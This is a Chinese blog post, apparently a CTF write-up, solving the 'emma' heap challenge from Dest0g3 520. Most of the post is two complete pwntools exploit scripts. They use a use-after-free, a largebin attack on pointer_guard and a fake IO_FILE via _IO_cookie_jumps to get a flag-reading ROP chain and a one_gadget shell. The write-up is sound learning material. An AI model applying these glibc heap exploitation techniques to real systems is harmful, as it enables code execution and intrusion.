dest0g3 520(招新赛)emma

于 2022-11-12 12:37:08 发布
阅读量228 收藏
点赞数 9
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63437215/article/details/127818435
版权

前言

emma在前边已经做过一个了,但是体会并不是很深刻,于是找到以前比赛的时候看不懂的一个题,现在再来复现一遍,发现又学到了很多东西。(本题使用libc版本2.33-0ubuntu5_amd64/libc-2.33.so)

题目分析

首先在输入index的时候没有大于0的检查,于是可以负数越界

 

 然后是在delete函数里指针没有置空,存在uaf漏洞。

由于本题没有沙箱,所以不仅可以orw读flag,还可以onegadget拿shell。所以针对这两种方法,分别进行分析。

 方法一:orw

exp

from pwn import *
context(arch='amd64', os='linux')
context.log_level = 'debug'

r = process('./emma')
elf = ELF("./emma")
libc = elf.libc

def info(a,b):
    log.info("\033[0;31;40m"+a+hex(b)+'\033[0m')

def ROL(content, key):
    tmp = bin(content)[2:].rjust(64, '0')
    return int(tmp[key:] + tmp[:key], 2)

def add(index,size,content):
  r.sendlineafter(">>",'1')
  r.sendlineafter("Index:",str(index))
  r.sendlineafter("Size:",str(size))
  r.sendafter('Content',content)

def edit(index,content):
  r.sendlineafter(">>",'2')
  r.sendlineafter("Index:",str(index))
  r.sendafter('Content',content)

def show(index):
  r.sendlineafter(">>",'3')
  r.sendlineafter("Index:",str(index))


def delete(index):
  r.sendlineafter(">>",'4')
  r.sendlineafter("Index:",str(index))

#------------------------------leak-----------------------------
add(-4,0x418,'a')
add(1,0x418,'a')
add(2,0x420,'a')
add(3,0x418,'a')

delete(2)
add(4, 0x430,'a')
show(2)

leak=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
info("leak->",leak)
libc_base=leak-0x1e0ff0
info("libc_base->",libc_base)


guard=libc_base-0x2890
pop_rdi = libc_base + 0x0000000000028a55
pop_rsi = libc_base + 0x000000000002a4cf
pop_rax = libc_base + 0x0000000000044c70
syscall = libc_base + 0x000000000006105a
gadget = libc_base + 0x000000000014a0a0  
# mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
setcontext = libc_base + libc.sym['setcontext']
IO_cookie_jumps = libc_base + 0x1e1a20
stderr = libc_base+libc.sym['stderr']
info("setcontext->",setcontext)
info("stderr->",stderr)

edit(2,"a"*0x10)
show(2)
r.recvuntil("a" * 0x10)
heap_base = u64(r.recv(6).ljust(8, '\x00'))-0xad0
info("heap_base->",heap_base)
#-------------------------------pointer_guard attack-----------------
delete(-4)
edit(2,p64(libc_base+0x1e0ff0)*2+p64(heap_base+0xad0)+p64(guard - 0x20))
add(5,0x430,'f')
edit(2, p64(heap_base + 0x290) + p64(libc_base + 0x1e0ff0) + p64(heap_base + 0x290) * 2)
edit(-4, p64(libc_base + 0x1e0ff0) + p64(heap_base + 0xad0) * 3)
add(-4,0x418,'a')
add(2,0x420,'b')
#---------------------------topchunk_size attack-----------------------
delete(5)
add(6, 0x420,'a')
edit(5,'a'*0x428+p64(0x300))

#------------------------------fake IO---------------------------------
next_chain = 0
fake_IO_FILE =  4*p64(0)
fake_IO_FILE += p64(0)                   # _IO_write_base = 0
fake_IO_FILE += p64(0xffffffffffffffff)  # _IO_write_ptr = 0xffffffffffffffff
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(0)                   # _IO_buf_base
fake_IO_FILE += p64(0)                   # _IO_buf_end
fake_IO_FILE = fake_IO_FILE.ljust(0x68, '\x00')
fake_IO_FILE += p64(next_chain)          # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x88, '\x00')
fake_IO_FILE += p64(heap_base)           # _lock = writable address
fake_IO_FILE = fake_IO_FILE.ljust(0xc0, '\x00')
fake_IO_FILE += p64(0)                   # _mode = 0
fake_IO_FILE = fake_IO_FILE.ljust(0xd8, '\x00')
fake_IO_FILE += p64(IO_cookie_jumps+0x40)# vtable
fake_IO_FILE += p64(heap_base+0xad0+0x10)       # rdi payload
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(ROL(gadget ^ (heap_base+0x290), 0x11))

fake_frame_addr = heap_base+0xae0+0x10
frame = SigreturnFrame()
frame.rdi = fake_frame_addr + 0xF8# ./flag
frame.rsi = 0
frame.rdx = 0x100
frame.rsp = fake_frame_addr + 0xF8 + 0x10
frame.rip = pop_rdi + 1  # ret

rop = [
    pop_rax,  # sys_open('flag', 0)
    2,
    syscall,
  
    pop_rax,  # sys_read(flag_fd, heap, 0x100)
    0,
    pop_rdi,
    3,
    pop_rsi,
    fake_frame_addr + 0x200,
    syscall,

    pop_rax,  # sys_write(1, heap, 0x100)
    1,
    pop_rdi,
    1,
    pop_rsi,
    fake_frame_addr + 0x200,
    syscall
]
payload = p64(0) + p64(fake_frame_addr) + '\x00' * 0x20 + p64(setcontext + 61)
payload += str(frame).ljust(0xF8, '\x00')[0x28:] + 'flag'.ljust(0x10, '\x00') + flat(rop)

edit(-4, fake_IO_FILE)
edit(2, payload)
r.sendlineafter(">>",'1')
r.sendlineafter("Index:",str(8))
gdb.attach(r)
r.sendlineafter("Size:",str(0x600))
r.interactive()

分析

由于在以前博客已经说过了emma的orw的做法,这里就不在逐个分析代码了。说一些重点:创建index为-4的堆块可以正好覆盖掉stderr的值,覆盖为第一个堆块(-4)的地址,而我试了试用largebin attack修改stderr,发现改的是stderr实际地址里的地址,而不是程序中stderr中的。所以这种方法应该不行。

附上函数执行流程

si进入

 si进入

 si进入

 si进入

 si进入

 si进入

 si进入

 si进入

 

进入cookie,rax异或之后就是setcontext 

 

 

 方法二:get  shell

exp

from pwn import *
context(arch='amd64', os='linux')
context.log_level = 'debug'

r = process('./emma')
elf = ELF("./emma")
libc = elf.libc

def info(a,b):
    log.info("\033[0;31;40m"+a+hex(b)+'\033[0m')

def ROL(content, key):
    tmp = bin(content)[2:].rjust(64, '0')
    return int(tmp[key:] + tmp[:key], 2)

def add(index,size,content):
  r.sendlineafter(">>",'1')
  r.sendlineafter("Index:",str(index))
  r.sendlineafter("Size:",str(size))
  r.sendafter('Content',content)

def edit(index,content):
  r.sendlineafter(">>",'2')
  r.sendlineafter("Index:",str(index))
  r.sendafter('Content',content)

def show(index):
  r.sendlineafter(">>",'3')
  r.sendlineafter("Index:",str(index))


def delete(index):
  r.sendlineafter(">>",'4')
  r.sendlineafter("Index:",str(index))

#------------------------------leak-----------------------------
add(-4,0x418,'a')
add(1,0x418,'a')
add(2,0x420,'a')
add(3,0x418,'a')

delete(2)
add(4, 0x430,'a')
show(2)

leak=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
info("leak->",leak)
libc_base=leak-0x1e0ff0
info("libc_base->",libc_base)
guard=libc_base-0x2890
onegadget=[0xde78c,0xde78f,0xde792]
ogg=libc_base+onegadget[0]
IO_cookie_jumps = libc_base + 0x1e1a20
stderr = libc_base+libc.sym['stderr']
info("stderr->",stderr)

edit(2,"a"*0x10)
show(2)
r.recvuntil("a" * 0x10)
heap_base = u64(r.recv(6).ljust(8, '\x00'))-0xad0
info("heap_base->",heap_base)
#-------------------------------pointer_guard attack-----------------
delete(-4)
edit(2,p64(libc_base+0x1e0ff0)*2+p64(heap_base+0xad0)+p64(guard - 0x20))
add(5,0x430,'f')
edit(2, p64(heap_base + 0x290) + p64(libc_base + 0x1e0ff0) + p64(heap_base + 0x290) * 2)
edit(-4, p64(libc_base + 0x1e0ff0) + p64(heap_base + 0xad0) * 3)
add(-4,0x418,'a')
add(2,0x420,'b')
#---------------------------topchunk_size attack-----------------------
delete(5)
add(6, 0x420,'a')
edit(5,'a'*0x428+p64(0x300))

#------------------------------fake IO---------------------------------
next_chain = 0
fake_IO_FILE =  4*p64(0)
fake_IO_FILE += p64(0)                   # _IO_write_base = 0
fake_IO_FILE += p64(0xffffffffffffffff)  # _IO_write_ptr = 0xffffffffffffffff
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(0)                   # _IO_buf_base
fake_IO_FILE += p64(0)                   # _IO_buf_end
fake_IO_FILE = fake_IO_FILE.ljust(0x68, '\x00')
fake_IO_FILE += p64(next_chain)          # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x88, '\x00')
fake_IO_FILE += p64(heap_base)           # _lock = writable address
fake_IO_FILE = fake_IO_FILE.ljust(0xc0, '\x00')
fake_IO_FILE += p64(0)                   # _mode = 0
fake_IO_FILE = fake_IO_FILE.ljust(0xd8, '\x00')
fake_IO_FILE += p64(IO_cookie_jumps+0x40)# vtable
fake_IO_FILE += p64(0)       # rdi payload
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(ROL(ogg ^ (heap_base+0x290), 0x11))

edit(-4, fake_IO_FILE)
r.sendlineafter(">>",'1')
r.sendlineafter("Index:",str(8))
gdb.attach(r)
r.sendlineafter("Size:",str(0x600))
r.interactive()

分析

还是通过伪造fake file的vtable让程序进入cookie,然后传递参数(rax)改为onegadget,使其call rax时候执行onegadget来get shell即可。

 si进入

 

 

KingKi1L3r
关注
  • 9
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF真题-Dest0g3CTF2022招新赛
06-01
CTF真题-Dest0g3CTF2022招新赛,来自BUUCTF。
Dest0g3-Java部分1
08-03
Dest0g3-Java部分1
Dest0g3 520迎新
qq_53263789的博客
06-17 2278
Dest0g3 520迎新
Dest0g3 520迎新 writeup by 树木
JEWSWS的博客
05-29 3453
信息 用户名:树木敲阔爱 类型:分榜前三 排名:25 MISC Welcome to fxxking DestCTF 关注微信公众号,得到flag Dest0g3{W31c0m3_t0_DestCTF2022!} Pngenius 题目是一张PNG图片,很难不让人联想到隐写术,我们使用stegsolve打开 在R0G0B0发现了Password for zip,猜测图片包含ZIP,使用foremost进行分解 分解后发现有密码,使用刚刚解出来的密码解压,得到flag
Dest0g3 520迎新 | root 新生
qq_32284207的博客
06-01 704
题解 费马分解 babyAES 题目 题解 ezStream 题目 题解 爆破求seed2 求flag ezDLP 题解 sage离散对数 Mr.Doctor 题目 题解 seed1、seed2 seed flag Bag 题目 题解 学习参考 学习参考 FourThousandRSA 题目 题解 NSSCTF原题,脚本小子🤔(事后具体复现) misc EasyEncode 爆破压缩包密码100861 摩斯码 hex py print() url base6
Dest0g3 520迎新web&misc
weixin_63231007的博客
07-19 1284
Destog3 520迎新web&misc题目复现
DEST戴尔服务器硬件日志收集工具
04-02
1.本工具为DELL服务器官方硬件日志提取工具,不是安装程序,请直接运行"dsetreport.hta"即可,运行时长大约5~15分钟,运行期间请关闭杀软等; 2.本程序可以在不关机的情况下完成服务器错误日志的收集;...
oracle数据库设置db_recovery_file_dest_size参数为0
11-02
当我们设置数据库的归档路径时,就没有必要在使用db_recovery_file_dest参数,可是如果db_recovery_file_dest_size的值不为0,那么该如何设置呢?
[Dest0g3 520迎新] 不会的部分 The correct flag,emma,Bag
weixin_52640415的博客
06-01 411
Dest0g3 520迎新
Dest0g3 520迎新 个人复现Writeup
m0_61596829的博客
06-01 1487
Dest0g3 520迎新 Dest0g3首次招新啦! Dest0g3 Team现逐步发展到各大高校及安全公司均有成员分布,在过去的半年里先后取得L3HCTF第十、SCTF第六及SUSCTF第四的优异成绩。 首届Dest0g3 520迎新更加注重CTFer的基础知识面掌握程度,由易到难,适合各学习阶段选手参加,纯萌新水准。 Dest0g3期待更多新生力量的加入,如有意向请在后提交wp与简历,或联系@Dest0g3 Team (QQ:1115230222) 比时间:2022.5.20 10:
Dest0g3 520迎新(上web)
qq_62046696的博客
07-08 326
打开界面看见require_once,自然想到require然后include,确定了这是一道文件包含的题目, 然后看见第三行 require_once已经包含了,flag.php,最后require_once肯定也是包含flag.php,但是这个once只能包含一次所以我们就要绕过,想了一下用filter伪协议读取flag。php试一下 发现仍然是原界面,没任何回显 重复链接绕过 base64解码即可打开界面代码如下 构建数组报错POST:ctf[]=1,看见fl4g后面有点连接符,因为下面
Dest0g3 520迎新wp复现
zhhhb1005的博客
08-28 311
放入 steg中观察发现password:Weak_Pas5w0rd然后放入kali中binwalk发现含有zip然后foremost进行分离,因为在steg中知道了密码,所以直接拿到flag。
Dest0g3 520迎新Writeup
qq_46230755的博客
07-13 261
Dest0g3 520迎新wp
# Dest0g3 520迎新(更新中)
xiao_he0123的博客
07-25 341
Dest0g3 520迎新
Dest0g3 520迎新WP
Praise_me的博客
05-29 858
Dest0g3 520迎新部分题目Write_up。
BUU Dest0g3 520迎新 WEB writeup
weixin_43610673的博客
05-29 2026
WEB phpdest <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } require_once 绕过不能重复包含文件的限制 /?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/r
Dest0g3 520迎新 writeup (misc部分 + web部分)
ShenZ的博客
05-30 2494
Dest0g3 520迎新 Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius EasyWord EasyEncode Python_jail rookie hacker-1 rookie hacker-2 4096 EasySSTI phpdest EasyPHP SimpleRCE funny_upload middle PharPOP 1.phar的上传与触发 2.POP链 NodeSoEasy ezip Really Easy Sql
from Crypto.Util.number import * f = open('flag.txt', 'r') flag = f.read() f.close() assert flag[:8] == "Dest0g3{" 这段代码的作用
最新发布
07-12
这段代码的作用是: 1. 导入 `Crypto.Util.number` 模块,该模块提供了一些与数字相关的密码学功能。 2. 打开名为 'flag.txt' 的文件,并将文件内容读取到变量 `flag` 中。 3. 关闭文件。 4. 使用断言语句(`assert`)检查变量 `flag` 的前8个字符是否等于 "Dest0g3{"。如果不相等,将引发异常。 综上所述,这段代码的目的是读取名为 'flag.txt' 的文件,并确保文件内容的前8个字符是 "Dest0g3{"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值